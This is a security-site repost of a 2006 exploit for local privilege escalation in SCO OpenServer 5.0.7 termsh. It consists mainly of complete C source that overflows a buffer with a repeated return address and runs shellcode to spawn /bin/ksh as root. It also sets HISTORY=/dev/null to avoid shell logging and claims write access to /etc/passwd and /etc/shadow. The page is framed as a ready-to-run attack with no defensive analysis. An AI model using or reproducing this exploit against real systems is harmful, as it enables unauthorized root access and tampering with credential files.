首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SCO Openserver 5.0.7 termsh local privilege escalation exploit
来源:http://www.lezr.com/vb 作者:RoD 发布时间:2006-01-04  

hi all

I RoD hEDoR

my web http://www.lezr.com/vb
------------[L - G - H]----------------
SCO Openserver 5.0.x exploit

attacker allowing for use this
flaw to gain write access to /etc/passwd or /etc/shadow

#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
"\x68\xff\xf8\xff\x3c\x6a\x65\x89"
"\xe6\xf7\x56\x04\xf6\x16\x31\xc0"
"\x50\x68""/ksh""\x68""/bin""\x89"
"\xe3\x50\x50\x53\xb0\x3b\xff\xd6";

int main(int argc,char* argv[])
{
char* buffer;
char* arg = "-o";
char *env[] = {"HISTORY=/dev/null",NULL};
long eip,ptr;
int i;
printf("[ SCO Openserver 5.0.7 termsh local privilege escalation
exploit\n");
if(argc < 2)
{
printf("[ Error : [path]\n[ Example: %s
/opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
exit(0);
}
eip = 0xa2080853;
buffer = malloc(7449 + strlen(shellcode));
memset(buffer,'\x00',7449 + strlen(shellcode));
ptr = (long)buffer + strlen(shellcode);
strncpy(buffer,shellcode,strlen(shellcode));
for(i = 1;i <= 1862;i++)
{
memcpy((char*)ptr,(char*)&eip,4);
ptr = ptr + 4;
}
execle(argv[1],argv[1],arg,buffer,NULL,env);
exit(0);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CuteNews <=1.4.1 remote com
·Valdersoft Shopping Cart versi
·/usr/bin/mtink local root expl
·WinRAR Buffer Overflow Vulnera
·Mozilla Firefox InstallVersion
·Windows XP/2003 Picture and Fa
·aMSN Messenger DoS
·The Lizard Cart CMS version 1.
·Microsoft Windows Shimgvw.dll
·ShixxNote Buffer Overflow
·linux 2.6.11 and below CPL 0 k
·Sun Solaris printd Daemon Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved